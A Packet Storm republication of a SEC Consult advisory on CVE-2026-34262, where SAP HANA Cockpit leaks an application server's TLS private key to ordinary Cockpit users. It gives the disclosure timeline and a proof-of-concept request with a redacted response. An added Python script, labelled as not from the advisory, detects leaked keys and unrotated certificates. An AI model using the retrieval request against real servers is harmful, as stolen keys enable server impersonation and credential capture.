📄 SAP HANA Cockpit / Database Explorer Private Key Disclosure

Published: 30 Apr 2026
Reported by: Ben Samtleben, Bernd Kaufmann
Type: packetstorm
Source: packetstorm.news

Exposed private key in SAP HANA Cockpit; CVE-2026-34262; patch SAP Security Note 3730639.

Related entries for CVE-2026-34262 (reporter: title, published):
  ATTACKERKB: CVE-2026-34262, 14 Apr 2026 00:09
  Circl: CVE-2026-34262, 14 Apr 2026 04:13
  CNNVD: SAP HANA Cockpit and SAP HANA Database Explorer security vulnerability, 14 Apr 2026 00:00
  CVE: CVE-2026-34262, 14 Apr 2026 00:09
  Cvelist: CVE-2026-34262 Information Disclosure Vulnerability in SAP HANA Cockpit and HANA Database Explorer, 14 Apr 2026 00:09
  EUVD: EUVD-2026-22173, 14 Apr 2026 00:09
  NCSC: Vulnerabilities fixed in SAP products, 14 Apr 2026 12:55
  NVD: CVE-2026-34262, 14 Apr 2026 01:16
  Positive Technologies: PT-2026-32569, 14 Apr 2026 00:00
  RedhatCVE: CVE-2026-34262, 29 Apr 2026 20:48

SEC Consult Vulnerability Lab Security Advisory < 20260415-0 >
    =======================================================================
                  title: Exposed Private Key of X.509 Certificate
                product: SAP HANA Cockpit & SAP HANA Database Explorer
     vulnerable version: HANA Cockpit <2.18.2 (HRTT <2.16.254002)
          fixed version: HANA Cockpit 2.18.2 (HRTT 2.16.254002)
             CVE number: CVE-2026-34262
                 impact: high
               homepage: https://www.sap.com/
                  found: 2025-04-24
                     by: Ben Samtleben (Office Berlin)
                         Bernd Kaufmann (Office Vienna)
                         SEC Consult Vulnerability Lab
    
                         An integrated part of SEC Consult, an Atos business
                         Europe | Asia
    
                         https://www.sec-consult.com
    
    =======================================================================
    
    Vendor description:
    -------------------
    "SAP is one of the world’s leading producers of software for the management
    of business processes."
    
    Source: https://www.sap.com/about/what-is-sap.html
    
    "SAP HANA cockpit is the main administration tool for SAP HANA. The SAP HANA
    cockpit provides tools for the administration and monitoring of SAP HANA
    databases (databases), and for development capabilities through the SAP
    HANA database explorer."
    
    Source: https://help.sap.com/docs/SAP_HANA_COCKPIT/df02d156db744412ad1f9e887aba68ad/ab5d442cc8a340fea07c15ef6f8eb537.html
    
    
    Business recommendation:
    ------------------------
    The vendor provides a patch which should be installed immediately, see
    SAP Security Note 3730639 (https://me.sap.com/notes/3730639).
    
    This patch does not completely mitigate the risk that the private keys were
    obtained by an attacker in the past. Therefore, SEC Consult strongly
    recommends rotating the affected X.509 certificates and corresponding private
    keys - even if this is currently not mentioned in the SAP Security Note.
    
    SEC Consult strongly recommends a thorough security review of the product,
    conducted by security professionals, to identify and resolve potential
    further security issues.
    
    
    Vulnerability overview/description:
    -----------------------------------
    1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)
    SAP HANA Cockpit users with access to the Database Explorer can obtain the
    X.509 certificate issued to the application server and its corresponding
    private key. With this key material an attacker can impersonate the
    application server at the network level and thereby capture user credentials
    or other sensitive data. The issue arises if mutual TLS (mTLS) is configured
    for the communication with the SAP HANA database.
    
    
    Proof of concept:
    -----------------
    1) Exposed Private Key of X.509 Certificate in SAP HANA Cockpit (CVE-2026-34262)
    When accessing the Database Explorer via the SAP HANA Cockpit, the following
    HTTP request is sent to the HRTT service in the background:
    
    GET /hrtt-service/sap/hana/cst/api/v2/databases HTTP/1.1
    Host: hana-cockpit-web-app.example.org:31033
    Cookie: JSESSIONID=[...]
    [...]
    
    The server response contains a list of all available databases.
    
    {
        "__count": 6,
        "d": {
            "results": [
                {
                    "__metadata": {
                        "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
                        "type": "database.Database"
                    },
                    "id": "C123456789",
                    "group_id": 0,
                    "catalog_name": "SID@SID",
                    "type": "COCKPIT_RESOURCE",
                    "disabled": false,
                    "has_login": false,
                    "cockpit_resource_id": 123456789,
                    "database_product_name": "HANA",
                    "options": {
                        "schema_filter": "[]"
                    },
                    "set_xs_applicationuser": true,
                    "hdl_support_sof": false
                },
                // [... more entries here...]
            ]
        }
    }
    
    However, the response can vary - most likely depending on other HTTP requests
    that have been sent. A more verbose response can be triggered by manually
    interacting with the Database Explorer and then repeating the request.
    (No database credentials are needed.) Then, the following information is returned:
    
    {
        "__count": 6,
        "d": {
            "results": [
                {
                    "__metadata": {
                        "uri": "/sap/hana/cst/api/v2/databases('C123456789')",
                        "type": "database.Database"
                    },
                    "id": "C123456789",
                    "group_id": 0,
                    "catalog_name": "SID@SID",
                    "type": "COCKPIT_RESOURCE",
                    "disabled": false,
                    "has_login": false,
                    "cockpit_resource_id": 123456789,
                    "database_product_name": "HANA",
                    "cockpit_resource_name": "SID@SID",
                    "options": {
                        "hosts": [
                            {
                                "host": "isidhdb01.example.org",
                                "port": "31013"
                            }
                        ],
                        "databaseName": "SID",
                        "encrypt": true,
                        "ca": [
                            "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]zg==\n-----END CERTIFICATE-----\n",
                            "-----BEGIN CERTIFICATE-----\nMII[... certificate removed ...]c4=\n-----END CERTIFICATE-----\n",
                        ],
                        "sslValidateCertificate": true,
                        "key": [
                            "-----BEGIN PRIVATE KEY-----MII[... private key removed ...]8tQ==-----END PRIVATE KEY-----"
                        ],
                        "cert": [
                            "-----BEGIN CERTIFICATE-----MII[... certificate removed ...]QHvC-----END CERTIFICATE----------BEGIN CERTIFICATE-----MII[...]yotP-----END CERTIFICATE-----"
                        ],
                        "schema_filter": "[]"
                    },
                    "set_xs_applicationuser": true,
                    "hdl_support_sof": false
                }
                // [... more entries here...]
            ]
        }
    }
    
    The HTTP response leaks not only additional metadata but, most importantly, an
    X.509 certificate chain and the private key of its leaf certificate. This
    certificate is issued to the application server hosting the SAP HANA Cockpit,
    not to the database server.
    
    The vulnerability can be reproduced with both the Cockpit Administrator and the
    Cockpit User role; since the Cockpit User role suffices, no administrative
    privileges are required.
    
    
    Vulnerable / tested versions:
    -----------------------------
    The following versions are affected:
    * SAP HANA Cockpit versions prior to 2.18.2 (SAP HANA Runtime Tools prior to 2.16.254002)
    
    
    Vendor contact timeline:
    ------------------------
    2025-07-01: Contacting vendor through vulnerability submission web form, receiving
                automatic confirmation.
    2025-10-13: Recontacting vendor via email after no response.
    2025-10-17: Vendor responds, declaring the issue "resolved" by Aug 30 without
                further details.
    2025-10-29: Inquiring about assigned CVE or SAP Security Note.
    2025-11-12: Sending reminder after no response.
    2025-11-28: Sending another reminder, still no response.
    2025-12-03: Vendor responds with the version containing the patch; states that
                no CVE will be assigned.
    2025-12-05: Contacting vendor, emphasizing that SAP Security Note and CVE are
                essential to inform customers and make them rotate their certificates.
    2025-12-10: Vendor responds, requesting time to clarify with internal stakeholders.
    2026-02-11: Contacting the vendor again, asking for any updates.
    2026-02-12: Vendor responds, reiterating patched version, no mention of SAP Security
                Note or CVE.
    2026-02-12: Reminding vendor of importance of notifying affected customers due to
                required certificate rotation.
    2026-02-25: Contacting MITRE regarding CVE assignment dispute.
    2026-02-27: Vendor agrees to issuing SAP Security Note and asks to wait with public disclosure.
    2026-04-14: SAP Security Note 3730639 (CVE-2026-34262) is published by the vendor.
    2026-04-15: Public release of advisory
    
    
    Solution:
    ---------
    According to SAP, the vulnerability was fixed in SAP HANA Cockpit version 2.18.2 (HRTT version 2.16.254002).
    For information on the available patch, please see SAP Security Note 3730639 (https://me.sap.com/notes/3730639).
    
    However, this does not completely mitigate the risk that the private keys were
    obtained by an attacker in the past. Therefore, SEC Consult strongly recommends
    rotating the affected X.509 certificates and corresponding private keys -
    even if this is currently not mentioned in the SAP Security Note.
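    Two of the points above lend themselves to a script: scanning the response of
    the /hrtt-service/sap/hana/cst/api/v2/databases request from the proof of
    concept for leaked key material, and checking whether the leaked leaf
    certificate is still the one a Cockpit host presents, which is what the
    rotation recommendation in this section asks for. The following Python is an
    added example, not code from the SEC Consult advisory or from SAP; the JSON
    shape follows the PoC response above, the PEM bodies are constructed
    placeholder bytes (not real certificates or keys), and live_leaf_fingerprint
    is the only part that touches the network.

```python
"""Triage helper for CVE-2026-34262 (added example, not from the advisory):
find leaked private keys in a HRTT /databases response and fingerprint the
leaked leaf certificate so it can be compared with what the host serves now."""
import base64
import hashlib
import json
import re
import ssl

# One PEM block. Matches whether or not the base64 body has line breaks and
# whether or not several blocks are glued together with no separator, which is
# exactly how the PoC response carries the key and the certificate chain.
PEM_BLOCK = re.compile(
    r"-----BEGIN (?P<label>[A-Z0-9 ]+)-----(?P<body>.*?)-----END (?P=label)-----",
    re.DOTALL,
)
PRIVATE_KEY_LABELS = {"PRIVATE KEY", "RSA PRIVATE KEY", "EC PRIVATE KEY",
                      "ENCRYPTED PRIVATE KEY"}


def pem_blocks(text: str) -> list[tuple[str, bytes]]:
    """Split one string into (label, DER bytes) pairs, one per PEM block."""
    blocks = []
    for m in PEM_BLOCK.finditer(text):
        b64 = re.sub(r"\s+", "", m.group("body"))  # tolerate wrapped or unwrapped bodies
        blocks.append((m.group("label"), base64.b64decode(b64)))
    return blocks


def sha256_fingerprint(der: bytes) -> str:
    """Hex SHA-256 over DER, i.e. `openssl x509 -fingerprint -sha256` without colons."""
    return hashlib.sha256(der).hexdigest()


def find_leaks(response_json: str) -> list[dict]:
    """One finding per database entry whose `options` carry a private key."""
    findings = []
    for db in json.loads(response_json)["d"]["results"]:
        opts = db.get("options", {})
        keys = [blk for s in opts.get("key", []) for blk in pem_blocks(s)]
        certs = [blk for s in opts.get("cert", []) for blk in pem_blocks(s)]
        key_types = [label for label, _ in keys if label in PRIVATE_KEY_LABELS]
        if not key_types:
            continue  # terse shape (only schema_filter): nothing leaked
        findings.append({
            "id": db["id"],
            "key_types": key_types,
            "chain_length": len(certs),
            # per the advisory the key belongs to the first (leaf) certificate
            "leaf_sha256": sha256_fingerprint(certs[0][1]) if certs else None,
        })
    return findings


def live_leaf_fingerprint(host: str, port: int) -> str:
    """Fingerprint of the certificate the host serves right now. If it equals a
    leaked leaf_sha256, the compromised certificate has not been rotated."""
    pem = ssl.get_server_certificate((host, port))
    return sha256_fingerprint(ssl.PEM_cert_to_DER_cert(pem))


# --- constructed sample data: placeholder bytes, not real certificates or keys ---
LEAF_DER = b"constructed leaf certificate bytes, not a real certificate"
INTERMEDIATE_DER = b"constructed intermediate certificate bytes"
CA_DER = b"constructed database CA certificate bytes"
KEY_DER = b"constructed PKCS#8 private key bytes, not a real key"


def pem_encode(label: str, der: bytes, newlines: bool) -> str:
    """Build a PEM block with or without line breaks, mirroring both shapes in the PoC."""
    sep = "\n" if newlines else ""
    return f"-----BEGIN {label}-----{sep}{base64.b64encode(der).decode()}{sep}-----END {label}-----{sep}"


def database_entry(options: dict) -> dict:
    return {"id": "C123456789", "catalog_name": "SID@SID",
            "type": "COCKPIT_RESOURCE", "options": options}


# Verbose shape from the PoC: key without line breaks, chain concatenated.
SAMPLE_RESPONSE = json.dumps({"__count": 1, "d": {"results": [database_entry({
    "hosts": [{"host": "isidhdb01.example.org", "port": "31013"}],
    "encrypt": True,
    "ca": [pem_encode("CERTIFICATE", CA_DER, newlines=True)],
    "key": [pem_encode("PRIVATE KEY", KEY_DER, newlines=False)],
    "cert": [pem_encode("CERTIFICATE", LEAF_DER, newlines=False)
             + pem_encode("CERTIFICATE", INTERMEDIATE_DER, newlines=False)],
    "schema_filter": "[]",
})]}})
# Terse shape (first response in the PoC): nothing to report.
SAMPLE_RESPONSE_TERSE = json.dumps(
    {"__count": 1, "d": {"results": [database_entry({"schema_filter": "[]"})]}})

if __name__ == "__main__":
    for f in find_leaks(SAMPLE_RESPONSE):
        print(f"{f['id']}: {f['key_types']} leaked, chain of {f['chain_length']}, "
              f"leaf sha256 {f['leaf_sha256']}")
```

    Feed find_leaks the body of the verbose response captured from an unpatched
    instance; if live_leaf_fingerprint(host, port) for the Cockpit web host equals
    any reported leaf_sha256, the key exposed by this issue is still in service and
    the rotation recommended above has not happened. The script only reports what
    the response carries; proving that the leaked key matches the leaf certificate
    needs a cryptography library and is out of scope here.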
    
    
    Workaround:
    -----------
    None
    
    
    Advisory URL:
    -------------
    https://sec-consult.com/vulnerability-lab/
    
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    SEC Consult Vulnerability Lab
    An integrated part of SEC Consult, an Atos business
    Europe | Asia
    
    About SEC Consult Vulnerability Lab
    The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an
    Atos business. It ensures the continued knowledge gain of SEC Consult in the
    field of network and application security to stay ahead of the attacker. The
    SEC Consult Vulnerability Lab supports high-quality penetration testing and
    the evaluation of new offensive and defensive technologies for our customers.
    Hence our customers obtain the most current information about vulnerabilities
    and valid recommendation about the risk profile of new technologies.
    
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    Interested to work with the experts of SEC Consult?
    Send us your application: https://sec-consult.com/career/
    
    Interested in improving your cyber security with the experts of SEC Consult?
    Contact our local offices: https://sec-consult.com/contact/
    ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    
    Mail: security-research at sec-consult dot com
    Web:https://www.sec-consult.com
    Blog:https://blog.sec-consult.com
    X:https://x.com/sec_consult
    
    EOF Ben Samtleben, Bernd Kaufmann / @2026

Vulners scores (as of 30 Apr 2026): Vulners AI Score 5.3 (medium risk); CVSS 3.1 4.3 to 5; EPSS 0.00304.